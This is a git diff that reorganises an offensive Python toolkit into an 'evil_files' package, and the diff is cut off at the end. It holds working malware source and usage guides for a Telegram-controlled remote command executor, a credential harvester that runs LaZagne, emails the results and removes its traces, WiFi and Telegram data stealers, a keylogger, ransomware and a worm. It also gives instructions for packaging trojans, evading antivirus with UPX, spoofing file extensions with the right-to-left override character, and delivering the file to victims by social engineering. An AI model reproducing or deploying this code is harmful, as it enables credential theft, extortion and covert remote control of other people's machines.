diff --git a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md b/HowTo/Malwares/CreateTrojanPackage.md similarity index 59% rename from pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md rename to HowTo/Malwares/CreateTrojanPackage.md index 16033b5..a78b68b 100644 --- a/pyhtools/malwares/Trojans/HowToCreateTrojanPackage.md +++ b/HowTo/Malwares/CreateTrojanPackage.md 
@@ -1,37 +1,44 @@ -# Packaging Trojans with any file. - - ## Using App Data +# Packaging Trojans with any file + +## Using App Data + +### Steps - ### Steps - Install Pyinstaller - Downloading Icon : - - Download Icon from [IconFinder](https://iconfinder.com/) - - set filters to free and choose high resolution. - - download icon + - Download Icon from [IconFinder](https://iconfinder.com/) + - set filters to free and choose high resolution. + - download icon - Changing downloaded png to ico - - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) - - Upload image - - choose desired settings - - convert and download ico file + - Visit [ICO convert](https://icoconvert.com/) or [OnlineConvert.com](https://image.online-convert.com/convert-to-ico) + - Upload image + - choose desired settings + - convert and download ico file - If using requests use 2.5.1 - ``` - $ pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" + + ```bash + pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py" ``` ### Bypassing AV using UPX + - Download [UPX](https://github.com/upx/upx/releases/tag/v3.96) -- Extract files +- Extract files - Use UPX to compress pyinstaller generated executable - Syntax: - ``` - $ ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" + + ```bash + ./upx "full_path_of_executable" -o "full_path_of_compressed_executable" ``` ### Spoofing File Type + - Copy Right to left override character (U+202E). copy from below or from [unicode-explorer website](https://unicode-explorer.com/c/202E) -``` -‮ -``` + + ```string + ‮ + ``` + - file_name-`(type_everything_in_reverse_order)` and paste copied character after `-`. - eg : sample_pdf-`fdp.exe` 
@@ -46,5 +53,6 @@ - spoofed file_name : spoofed_al`exe.pdf` - actual file_name : spoofed_al`fdp.exe` -### Send File to victim -- Send file to victim through using attacks or social engineering. \ No newline at end of file +### Send File to victim + +- Send file to victim through using attacks or social engineering. diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-HTTP.md similarity index 97% rename from pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-HTTP.md index e886bcf..dd61f9e 100644 --- a/pyhtools/malwares/reverse_backdoor/HTTP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-HTTP.md @@ -5,14 +5,18 @@ ## Usage ### Attack over LAN + - Start listener + ```bash python3 listener.py ``` + > Default port = 8080 > Change port in `listerner.py` on line 33 if another service is using 8080 port - Edit `IP` and `PORT` values in `backdoor.py` on line 48 + ```python IP = 'attacker_local_ip' PORT = attacker_port # 8080 @@ -21,35 +25,41 @@ ### Attack over the internet - Start a ssh tunnel on attacker's device. + ```bash ssh -R 80:localhost: ``` - > Note : Replace with port on which local server is running + > Note : Replace with port on which local server is running - Copy link that will be available after successfully tunelling between attacker's machine and localhost.run server. + ``` example : .localhost.run ``` - Start Listener on your localhost using + ```bash python3 listener.py ``` - Replace copied link in `backdoor.py` on line 48. + ```python IP = '.localhost.run' ``` - Use social engineering to make user to execute the python file or created standalone executable/trojan. Use python to run backdoor.py script. + ``` python3 backdoor.py ``` - Now use post exploitation tools to gain admin priviliges -# Tested on +# Tested on + - Windows 10 - Debian based OSes -- Android Termux \ No newline at end of file +- Android Termux 
diff --git a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md b/HowTo/Malwares/ReverseBackdoor-TCP.md similarity index 71% rename from pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md rename to HowTo/Malwares/ReverseBackdoor-TCP.md index 1b12f3a..b3aa391 100644 --- a/pyhtools/malwares/reverse_backdoor/TCP/HowToUse.md +++ b/HowTo/Malwares/ReverseBackdoor-TCP.md @@ -1,5 +1,8 @@ +# TCP backdoor + ## Change Values according to need + - change ip and port to your desired values in listener.py and reverse_backdoor.py - run listener.py on attackers machine. @@ -7,26 +10,29 @@ - run backdoor.py on victims machine. ## Create a executable\standalone + - pip3 install pyinstaller -- Creating executable with console: +- Creating executable with console: + ```bash - $ pyinstaller python_file.py --onefile + pyinstaller python_file.py --onefile ``` -- Creating executable without console: +- Creating executable without console: + ```bash - $ pyinstaller python_file.py --onefile --noconsole + pyinstaller python_file.py --onefile --noconsole ``` - -> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. +> note : noconsole works when we're not using stream like stdin, stdout, stderr, etc. > If we're using STDI/O streams then we have to set then to DEVNULL = open(os.devnull, 'wb') then set IOstreams to DEVNULL > if using subprocess.check_output then use subprocess.check_output(command, stderr=subprocess.DEVNULL, stdin=subprocess.DEVNULL). > here stdio is being handled by check_output. so no need to handle stdio. ## Create windows executable on linux -- Install Wine -- Download Python for windows -- Install Downloaded python for windows using wine on linux + +- Install Wine +- Download Python for windows +- Install Downloaded python for windows using wine on linux - the other commands remain the same to create executable. diff --git a/HowTo/Malwares/SendEmail.md b/HowTo/Malwares/SendEmail.md new file mode 100644 index 0000000..93c0ccc --- /dev/null 
+++ b/HowTo/Malwares/SendEmail.md @@ -0,0 +1,22 @@ +# Send Email Requirements + +## Steps + +- Turn on 2FA +- Go to GoogleAcc->Security->AppPassword->Custom +- Copy generated key and use that as password + +## Use malwares.utils module + +```python +from pyhtools.malwares.utils import send_mail + +send_mail( + email = 'email.id@domain.com', + password = 'your', + receiver_mail = 'emails_separated_by_comma', + message = 'your message', + smtp_server = 'smtp.gmail.com', + smtp_port= 587 +) +``` diff --git a/pyhtools/malwares/telegram_data_harvester/HowToUse.md b/HowTo/Malwares/TelegramDataHarvester.md similarity index 99% rename from pyhtools/malwares/telegram_data_harvester/HowToUse.md rename to HowTo/Malwares/TelegramDataHarvester.md index 8a3cc23..f049454 100644 --- a/pyhtools/malwares/telegram_data_harvester/HowToUse.md +++ b/HowTo/Malwares/TelegramDataHarvester.md @@ -1,6 +1,7 @@ # How to use Telegram Data Harvester ## Steps + - Create a Gmail App Password - update telegram_data_harvester.py lines 64 and 65 with your gmail and App Password - Create a executable file or trojan @@ -8,6 +9,7 @@ - You will receive an email with telegram data as a zip when target executes the program/trojan. ## How to use their account + - Extract tdata folder from the zip file - go to your installed telegram desktop location - replace your tdata file with the zip tdata folder diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md b/HowTo/Malwares/TelegramRemoteCodeExecutor.md similarity index 96% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md rename to HowTo/Malwares/TelegramRemoteCodeExecutor.md index 87c330c..795bf74 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/HowToUse.md +++ b/HowTo/Malwares/TelegramRemoteCodeExecutor.md 
@@ -1,12 +1,11 @@ # How to use Telegram Remote Code Executor -- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` -- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` +- Get Token for bot from [Telegram BotFather](https://t.me/botfather) and update `API_KEY` on line 7 of `TelegramRemoteCodeExecutor.py` +- Get Attacker's User ID from [UserInfoBot](https://t.me/userinfobot) or run TelegramRemoteCodeExecutor.py and use `/start` command to get user id and then update `CHAT_ID` on line 8 of `TelegramRemoteCodeExecutor.py` - Create trojan/malware using `pyinstaller` and send it to victim - When victims runs malware program, attacker will be notified through the bot on telegram - Attacker can use commands to exploit the machine remotely through Telegram over the internet - | Command | Description | Params | |:-----:|:--------:|:-------: | | /start | starts interaction with the bot and returns command issuer details | None | diff --git a/HowTo/Malwares/WirelessProfileHarvester.md b/HowTo/Malwares/WirelessProfileHarvester.md new file mode 100644 index 0000000..25a549b --- /dev/null +++ b/HowTo/Malwares/WirelessProfileHarvester.md @@ -0,0 +1,7 @@ +# Wireless Profile Harvester + +## HOW to use + +- Read [HowTo/Malwares/SendEmail.md](./SendEmail.md) to and use app password +- Update email id and password (app password) +- Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/Malwares/TelegramBackdoor.py new file mode 100644 index 0000000..d9d83fe --- /dev/null +++ b/examples/Malwares/TelegramBackdoor.py 
@@ -0,0 +1,14 @@ +from curses import start_color +''' +Controls the compromised machine using telegram +''' +import pyhtools.evil_files.malwares.telegram_remote_code_executor.TelegramRemoteCodeExecutor as evil_bot + +# set API_KEY and CHAT_ID before starting bot +# Note: to find user id, start the bot, and message this bot with /start +evil_bot.API_KEY = 'your_bot_key/token' +evil_bot.CHAT_ID = 0 # int - attacker's user id + +# start bot +# Note: for windows create malware with runtime broker +evil_bot.start_bot() \ No newline at end of file diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/Malwares/TelegramDataHarvester.py new file mode 100644 index 0000000..52ffead --- /dev/null +++ b/examples/Malwares/TelegramDataHarvester.py @@ -0,0 +1,12 @@ +from pyhtools.evil_files.malwares.telegram_data_harvester.harvester import TelegramHarvester + + +tdata_harvester = TelegramHarvester( + sender_email='dummy_email', # dummy email to send collected data + sender_passwd='dummy_email_passwd', # dummy email account password for authentication + server='smtp.gmail.com', # smtp email server domain + port=587, # smtp server port + receivers='attacker_email', # email where harvested data will sent +) + +tdata_harvester.start() diff --git a/pyhtools/malwares/keylogger/dlogs.py b/examples/Malwares/key_logger.py similarity index 64% rename from pyhtools/malwares/keylogger/dlogs.py rename to examples/Malwares/key_logger.py index f3ca53e..35b7f54 100644 --- a/pyhtools/malwares/keylogger/dlogs.py +++ b/examples/Malwares/key_logger.py @@ -1,4 +1,4 @@ -from keylogger import KeyLogger +from pyhtools.evil_files.malwares.keylogger import KeyLogger key_logger = KeyLogger(email='yourgmailaccount', password='yourpassword', interval_in_secs=60) key_logger.run() diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/Malwares/wifi-password-harvester.py new file mode 100644 index 0000000..b9b7fbd --- /dev/null +++ b/examples/Malwares/wifi-password-harvester.py 
@@ -0,0 +1,13 @@ +import imp +from pyhtools.evil_files.malwares.wireless_password_harvester.harvester import WiFiPasswordHarvester + +# create obj +harvester = WiFiPasswordHarvester( + email='your_email', + passwd='email_passwd', + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +# start harvester +harvester.start() diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/Ransomwares/dmsec_decrypter.py new file mode 100644 index 0000000..ebb9e1f --- /dev/null +++ b/examples/Ransomwares/dmsec_decrypter.py @@ -0,0 +1,14 @@ +from pyhtools.evil_files.ransomwares.dmsec.decrypter import DMSecDecrypter + +print('[*] Decrypting....') + +# specify paths to be decrypted +PATHS = [r'paths_to_be_decrypted', ] + +KEY = input('[+] Enter KEY : ') + +# don't pass PATHS if all the drives are to be decrypted. +encrypter = DMSecDecrypter(KEY, PATHS) +encrypter.start() + +print('[*] Decrypted...') diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/Ransomwares/dmsec_encrypter.py new file mode 100644 index 0000000..3099c53 --- /dev/null +++ b/examples/Ransomwares/dmsec_encrypter.py @@ -0,0 +1,21 @@ +from pyhtools.evil_files.ransomwares.dmsec.encrypter import DMSecEncrypter + +# Print some meaningful text, so that user don't suspect program as ransomeware +print('[*] Loading...') + +# Specify paths to be encrypted +PATHS = [ + r'path_to_be_encrypted', +] + +# don't pass PATHS if all the drives are to be encrypted +encrypter = DMSecEncrypter( + paths=PATHS, + email='yourgmailid', + passwd='yourapppassword' + smtp_server='smtp.gmail.com', + smtp_port=587, +) + +encrypter.start() +print('[*] Completed') diff --git a/examples/Worms/DirClonerWorm.py b/examples/Worms/DirClonerWorm.py new file mode 100644 index 0000000..654230f --- /dev/null +++ b/examples/Worms/DirClonerWorm.py 
@@ -0,0 +1,20 @@ +from pyhtools.evil_files.worms.dir_cloner import DirCloner + +# create obj and path +dir_worm = DirCloner() +path = dir_worm.get_curr_drive_folder() + +# set cloning directory +dir_clone_set_status = dir_worm.set_clone_path(path) + +# remove print statements while creating evil files +if dir_clone_set_status: + print(f"[*] Clone path : {path}") +else: + print(f"[!] Failed to set new clone path {path}") + +# for specific folder +dir_worm.clone_dir(times=1, start_after=0) + +# for specific folder and its subfolder +dir_worm.clone_all_dirs(times=1, start_after=0, path=path) diff --git a/pyhtools/UI/functions.py b/pyhtools/UI/functions.py index 0c1b4bf..f2b5e38 100644 --- a/pyhtools/UI/functions.py +++ b/pyhtools/UI/functions.py @@ -1,11 +1,11 @@ from pyhtools.UI.colors import * from prettytable import PrettyTable +from pyhtools.evil_files.malwares.utils import send_mail import pyfiglet import os import sys import pyhtools.attackers.attackers as attacker -import pyhtools.malwares.reverse_backdoor.TCP.listener as listener -import pyhtools.malwares.send_mail.send_mail as mail +import pyhtools.evil_files.malwares.reverse_backdoor.TCP.listener as listener def clrscr(): @@ -23,7 +23,7 @@ def banner(): print(BRIGHT_YELLOW + pyfiglet.figlet_format('PyHTools')) print(BRIGHT_YELLOW + '+' + '-'*42 + '+') - print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0 |') + print(BRIGHT_WHITE + '| written by Dhrumil Mistry\tpht v1.0.1 |') print(BRIGHT_YELLOW + '+' + '-'*42 + '+') @@ -72,7 +72,7 @@ def send_mail_to(email, password, receiver, subject, body) -> bool: ''' print(BRIGHT_WHITE + '[*] Sending email...') msg = f'Subject: {subject}\n{body}' - if mail.send_mail_to(email, receiver, password, msg): + if send_mail(email, receiver, password, msg): print(BRIGHT_YELLOW + '[\u2714] Mail Sent') else: print(BRIGHT_RED + '[\u274c] Unable to send mail.') 
diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py b/pyhtools/evil_files/malwares/__init__.py similarity index 100% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/__init__.py rename to pyhtools/evil_files/malwares/__init__.py diff --git a/pyhtools/malwares/Trojans/__init__.py b/pyhtools/evil_files/malwares/credential_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/Trojans/__init__.py rename to pyhtools/evil_files/malwares/credential_harvester/__init__.py diff --git a/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py new file mode 100644 index 0000000..cfa7c1b --- /dev/null +++ b/pyhtools/evil_files/malwares/credential_harvester/credential_harvester.py 
@@ -0,0 +1,59 @@ +''' +module: credential_harvester.py +description: get user credentials on Windows machine +platform: Windows +''' +import requests +import os +import tempfile +import subprocess +import zipfile +from pyhtools.evil_files.malwares.utils import send_mail, download +from shutil import rmtree + + +class CredentialHarvester: + @staticmethod + def run(email: str, password: str, lazagne_download_link: str = r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip', smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587): + ''' + generates data report and sends email to self + ''' + # change workding directory to tmp directory + tmp_dir = tempfile.gettempdir() + os.chdir(tmp_dir) + + # get file and extracted directory names + file_name = lazagne_download_link.split('/')[-1] # Windows.zip + extract_dir = file_name.split('.')[0] # Windows + + # download and unzip lazagne + download(lazagne_download_link) + with zipfile.ZipFile(file_name, 'r') as zip_file: + zip_file.extractall(tmp_dir) + + # change to extracted directory (Windows) + os.chdir(extract_dir) + + # generate reports + recovered_report = subprocess.call('laZagne_x86.exe all') + report = subprocess.check_output('lazagne.exe all -vv') + msg = f'Subject: Credential Harvester Report.\n\n{"-"*25}\n{report}\n{"-"*25}\n{recovered_report}' + + # mail reports + send_mail( + email=email, + receiver_mail=email, + password=password, + message=msg, + smtp_server=smtp_server, + smtp_port=smtp_port, + ) + + # remove traces + os.chdir('..') + rmtree(extract_dir) + os.remove(file_name) + + +if __name__ == '__main__': + CredentialHarvester.run('your_gmail', 'your_gmail_passwd') diff --git a/pyhtools/malwares/__init__.py b/pyhtools/evil_files/malwares/keylogger/__init__.py similarity index 100% rename from pyhtools/malwares/__init__.py rename to pyhtools/evil_files/malwares/keylogger/__init__.py 
diff --git a/pyhtools/malwares/keylogger/keylogger.py b/pyhtools/evil_files/malwares/keylogger/keylogger.py similarity index 100% rename from pyhtools/malwares/keylogger/keylogger.py rename to pyhtools/evil_files/malwares/keylogger/keylogger.py diff --git a/pyhtools/malwares/credential_harvester/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py similarity index 100% rename from pyhtools/malwares/credential_harvester/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/backdoor.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/HTTP/listener.py diff --git a/pyhtools/malwares/downloader/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py similarity index 100% rename from pyhtools/malwares/downloader/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/listener.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/listener.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/listener.py diff --git a/pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py b/pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/reverse_backdoor.py rename to pyhtools/evil_files/malwares/reverse_backdoor/TCP/reverse_backdoor.py 
diff --git a/pyhtools/malwares/keylogger/__init__.py b/pyhtools/evil_files/malwares/reverse_backdoor/__init__.py similarity index 100% rename from pyhtools/malwares/keylogger/__init__.py rename to pyhtools/evil_files/malwares/reverse_backdoor/__init__.py diff --git a/pyhtools/malwares/reverse_backdoor/HTTP/__init__.py b/pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/HTTP/__init__.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/__init__.py diff --git a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py similarity index 92% rename from pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py rename to pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py index 5123331..5c813b2 100644 --- a/pyhtools/malwares/telegram_data_harvester/telegram_data_harvester.py +++ b/pyhtools/evil_files/malwares/telegram_data_harvester/harvester.py @@ -144,12 +144,3 @@ def start(self): for tpath in self.tdata_paths: self.create_archive_and_send_mail( source_path=tpath, dest_path=self.temp_path) - -if __name__ == '__main__': - tdata_harvester = TelegramHarvester( - sender_email='dummy_email', # dummy email to send collected data - sender_passwd='dummy_email_passwd', # dummy email account password for authentication - server='smtp.gmail.com', # smtp email server domain - port=587, # smtp server port - receivers='attacker_email', # email where harvested data will sent - ) \ No newline at end of file 
diff --git a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py similarity index 80% rename from pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py index df5c501..188e57e 100644 --- a/pyhtools/malwares/TelegramRemoteCodeExecutor/TelegramRemoteCodeExecutor.py +++ b/pyhtools/evil_files/malwares/telegram_remote_code_executor/TelegramRemoteCodeExecutor.py @@ -1,11 +1,12 @@ -import telebot, os +import telebot +import os from telebot.types import Message as tele_message from subprocess import check_output # set API_KEY and CHAT_ID before starting bot API_KEY = 'your_bot_key/token' -CHAT_ID = 0 # int - attacker's user id +CHAT_ID = 0 # int - attacker's user id # to find user id, start the bot, and message this bot with /start @@ -26,11 +27,12 @@ /download download file from the victims machine to attacker's via telegram chat ''' +# might raise issue, need to update API value bot = telebot.TeleBot(API_KEY) def get_victim(): - return check_output("whoami",shell=True).decode("utf-8") + return check_output("whoami", shell=True).decode("utf-8") def inform_attacker(): 
@@ -41,28 +43,29 @@ def inform_attacker(): bot.send_message(CHAT_ID, text=message) -def get_user_details(message:tele_message): +def get_user_details(message: tele_message): ''' returns messenger's details ''' return f'ID : {message.from_user.id}\n Name :{message.from_user.full_name}\n[UserName] {message.from_user.username}\nIS BOT : {message.from_user.is_bot}' -def validate_request(message:tele_message) -> bool: +def validate_request(message: tele_message) -> bool: ''' returns True is if request is from hacker, else False ''' if message.from_user.id != int(CHAT_ID): alert_message = f'[!] Intruder Alert!!\n{get_user_details(message)}\nTried Command : {message.text}\n\nDetailed Information :{message}' bot.send_message(chat_id=CHAT_ID, text=alert_message) - bot.send_message(chat_id=message.from_user.id, text='Not Authorized !!') + bot.send_message(chat_id=message.from_user.id, + text='Not Authorized !!') return False return True @bot.message_handler(commands=['start']) -def start(message:tele_message): +def start(message: tele_message): ''' start conversation ''' @@ -74,12 +77,12 @@ def start(message:tele_message): @bot.message_handler(commands=['exec']) -def execute(message:tele_message): +def execute(message: tele_message): ''' executes and returns result to the attacker ''' if not validate_request(message): - return + return cmd = message.text.split('/exec')[-1].strip() try: @@ -91,7 +94,7 @@ def execute(message:tele_message): @bot.message_handler(commands=['help']) -def help(message:tele_message): +def help(message: tele_message): ''' prints help ''' @@ -100,7 +103,7 @@ def help(message:tele_message): @bot.message_handler(commands=['cd']) -def cd(message:tele_message): +def cd(message: tele_message): ''' change current working directory ''' 
@@ -114,7 +117,7 @@ def cd(message:tele_message): @bot.message_handler(commands=['ls']) -def ls(message:tele_message): +def ls(message: tele_message): ''' replies with list of all the folders and files in the dir to the attacker ''' @@ -125,20 +128,22 @@ def ls(message:tele_message): @bot.message_handler(commands=['download']) -def download_file(message:tele_message): +def download_file(message: tele_message): ''' downloads file from victim's machine to attacker's machine ''' if not validate_request(message): return - + file_path = message.text.split('/download')[-1].strip() if os.path.isfile(file_path): with open(file_path, 'rb') as file: file_data = file.read() - bot.send_document(chat_id=CHAT_ID, data=file_data, caption=f'[*] {file_path} downloaded from {get_victim()}') + bot.send_document(chat_id=CHAT_ID, data=file_data, + caption=f'[*] {file_path} downloaded from {get_victim()}') else: - bot.send_message(chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') + bot.send_message( + chat_id=CHAT_ID, text=f'[!] {file_path} does not exists.') def start_bot(): @@ -147,9 +152,3 @@ def start_bot(): ''' inform_attacker() bot.polling() - - -if __name__ == '__main__': - # for windows create malware with runtime broker - # while packaging remove print statements - start_bot() diff --git a/pyhtools/malwares/reverse_backdoor/TCP/__init__.py b/pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/TCP/__init__.py rename to pyhtools/evil_files/malwares/telegram_remote_code_executor/__init__.py diff --git a/pyhtools/evil_files/malwares/utils.py b/pyhtools/evil_files/malwares/utils.py new file mode 100644 index 0000000..f8056c6 --- /dev/null +++ b/pyhtools/evil_files/malwares/utils.py 
@@ -0,0 +1,36 @@ +import smtplib +import requests + + +def send_mail(email: str, receiver_mail: list[str], password: str, message: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> bool: + ''' + sends mail to specific address/addresses. + ''' + try: + server = smtplib.SMTP(smtp_server, smtp_port) + server.starttls() + server.login(email, password) + server.sendmail(email, receiver_mail, message) + server.quit() + return True + except smtplib.SMTPException as e: + print('[-] Exception : ', e) + return False + + +def download(url: str) -> bool: + ''' + description: download and save file from the url. + params: url + returns: bool + ''' + try: + response = requests.get(url) + file_name = url.split('/')[-1] + with open(file_name, 'wb') as file: + file.write(response.content) + return True + + except Exception as e: + print('[-] Exception : ', e) + return False diff --git a/pyhtools/malwares/reverse_backdoor/__init__.py b/pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py similarity index 100% rename from pyhtools/malwares/reverse_backdoor/__init__.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/__init__.py diff --git a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py similarity index 74% rename from pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py rename to pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py index fa8856c..456bcc9 100644 --- a/pyhtools/malwares/wireless_password_harvester/wireless_profile_harvester.py +++ b/pyhtools/evil_files/malwares/wireless_password_harvester/harvester.py 
@@ -1,34 +1,18 @@ +from pyhtools.evil_files.malwares.utils import send_mail import subprocess -import smtplib import re class WiFiPasswordHarvester: - def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', port: int = 587) -> None: + def __init__(self, email: str, passwd: str, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # smtp conf self.smtp_server = smtp_server - self.smtp_port = port + self.smtp_port = smtp_port # login details self.email = email self.passwd = passwd - def send_mail(self, message: str) -> bool: - ''' - sends email from mail to itself. - params: mail, password, message -> str - retuns bool - ''' - try: - server = smtplib.SMTP(self.smtp_server, self.smtp_port) - server.starttls() - server.login(self.email, self.password) - server.sendmail(self.email, self.email, message) - server.quit() - return True - except smtplib.SMTPException as e: - return False - def get_credentials(self) -> str: ''' returns wifi credentials as str @@ -71,7 +55,7 @@ def get_username(): def start(self): credentials = self.get_credentials() if credentials: - if self.send_mail(message=credentials): + if send_mail(self.email, self.email, self.passwd, credentials, self.smtp_server, self.smtp_port): print('[*] Process Completed Successfully') return True else: diff --git a/pyhtools/malwares/send_mail/__init__.py b/pyhtools/evil_files/ransomwares/__init__.py similarity index 100% rename from pyhtools/malwares/send_mail/__init__.py rename to pyhtools/evil_files/ransomwares/__init__.py diff --git a/pyhtools/ransomwares/dmsec/HowToUse.md b/pyhtools/evil_files/ransomwares/dmsec/HowToUse.md similarity index 100% rename from pyhtools/ransomwares/dmsec/HowToUse.md rename to pyhtools/evil_files/ransomwares/dmsec/HowToUse.md 
diff --git a/pyhtools/malwares/telegram_data_harvester/__init__.py b/pyhtools/evil_files/ransomwares/dmsec/__init__.py similarity index 100% rename from pyhtools/malwares/telegram_data_harvester/__init__.py rename to pyhtools/evil_files/ransomwares/dmsec/__init__.py diff --git a/pyhtools/ransomwares/dmsec/decrypter.py b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py similarity index 78% rename from pyhtools/ransomwares/dmsec/decrypter.py rename to pyhtools/evil_files/ransomwares/dmsec/decrypter.py index 5a022fb..0dbe19e 100644 --- a/pyhtools/ransomwares/dmsec/decrypter.py +++ b/pyhtools/evil_files/ransomwares/dmsec/decrypter.py @@ -4,15 +4,16 @@ from os.path import join from psutil import disk_partitions -class DMSECDecrypter: - def __init__(self, key:str=None, paths:list=None) -> None: + +class DMSecDecrypter: + def __init__(self, key: str = None, paths: list = None) -> None: # check key if key == None: print('[!] Invalid KEY') exit() # convert key to bytes - if type(key)==str: + if type(key) == str: key = bytes(key, encoding='utf-8') self.KEY = key print('[!] Decrypting data using KEY :', self.KEY) @@ -27,8 +28,6 @@ def __init__(self, key:str=None, paths:list=None) -> None: self.PATHS = paths print('[!] PATHS to be decrypted :\n', self.PATHS) - - def __get_partitions_path(self) -> list: ''' returns all mounted partition's mount points as a list @@ -38,8 +37,7 @@ def __get_partitions_path(self) -> list: mount_points.append(partition.mountpoint) return mount_points - - def decrypt_file(self, file_path:str): + def decrypt_file(self, file_path: str): ''' decrypts single file ''' @@ -61,8 +59,7 @@ def decrypt_file(self, file_path:str): print(f'[!] Failed to decrypt {file_path}') return False - - def decrypt_files(self, path:str): + def decrypt_files(self, path: str): ''' decrypts all the files in the specified path ''' 
@@ -71,22 +68,6 @@ def decrypt_files(self, path:str): file_path = join(root, file) self.decrypt_file(file_path=file_path) - def start(self): for path in self.PATHS: self.decrypt_files(path) - - -if __name__ == '__main__': - print('[*] Decrypting....') - - # specify paths to be decrypted - PATHS = [r'paths_to_be_decrypted',] - - KEY = input('[+] Enter KEY : ') - - # don't pass PATHS if all the drives are to be decrypted. - encrypter = DMSECDecrypter(KEY, PATHS) - encrypter.start() - - print('[*] Decrypted...') diff --git a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py similarity index 56% rename from pyhtools/ransomwares/dmsec/dmsec_ransomeware.py rename to pyhtools/evil_files/ransomwares/dmsec/encrypter.py index 66b1723..ced30a1 100644 --- a/pyhtools/ransomwares/dmsec/dmsec_ransomeware.py +++ b/pyhtools/evil_files/ransomwares/dmsec/encrypter.py @@ -1,17 +1,18 @@ -import smtplib from cryptography.fernet import Fernet from os import walk, environ from os.path import join from psutil import disk_partitions +from pyhtools.evil_files.malwares.utils import send_mail -class DMSECEncrypter: - def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None: +class DMSecEncrypter: + def __init__(self, paths: list = None, email: str = None, passwd: str = None, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None: # generate new key self.KEY = Fernet.generate_key() + message = f'Subject: 